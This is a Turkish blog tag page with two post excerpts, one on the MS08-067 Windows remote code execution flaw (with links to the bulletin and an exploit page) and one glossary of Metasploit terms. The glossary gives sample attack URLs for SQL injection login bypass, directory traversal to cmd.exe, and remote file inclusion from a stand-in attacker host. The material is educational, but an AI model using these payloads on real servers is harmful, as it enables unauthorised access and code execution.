‘metasploitle hack’ Olarak Etiketlenmiş Yazılar

MS Windows Server Service Code Execution (MS08-067)

23 Ekim 2008 Perşembe günü Microsoft bir yama yayınladı.Bu yamanın kapattığı açıklık bütün Windows türlerini tehdit etdiyor. Özellikle de Windows 2000/SP4, Windows XP/SP2/SP3 ve Windows 2003/SP1/SP2 işletim sistemlerinde uzaktan kod çalıştırılmasına izin vermekte , Windows Vista ve Windows 2008 Server işletim sistemlerinde ise servis dışı bırakma saldırılarına olanak sağlamaktadır.
Microsoft Güvenlik Bülteni:
http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
Exploit Kodları:
http://www.milw0rm.com/exploits/7104
Örnek Bir Saldırı ;

Tam ekran [...]


08 December 2008 | ozan | Görsel Anlatımlar, Güvenlik, Güvenlik Duyuruları | 1 Yorum | Devamı
Etiketler: , , ,

Metasploit ile Güvenlik Denetimi

Metasploit ile Güvenlik Denetimi
Terimler:
Exploit : Bir sistemin yada programin güvenlik açigini kullanarak yetkisiz bir islem yapilmasini saglayan yöntem.
http://sunucu/script/login.asp?uid=’ OR 1=1–
http://sunucu/script/..%c0%af../winnt/system32/cmd.exe?/c+dir
http://sunucu/script/index.php?dizin=http://saldırgan.com/kotukod.txt?
Payload : Exploit sonrasi çalisip yetkisiz islevi gerçeklestirecek içerik.
Shellcode:Exploit sonrasi çalisicak olan sisteme özel kodlar.
Nop : “Not Operation” , bellek yeri öğrenme amaçlı bellek dolduran bitler..
Encoder : Çalışacak olan Shellcode’u değiştiren ve IDS/IPS [...]


29 May 2008 | ozan | Ethical Hacker, Görsel Anlatımlar, Güvenlik | 3 Yorum | Devamı
Etiketler: , , , ,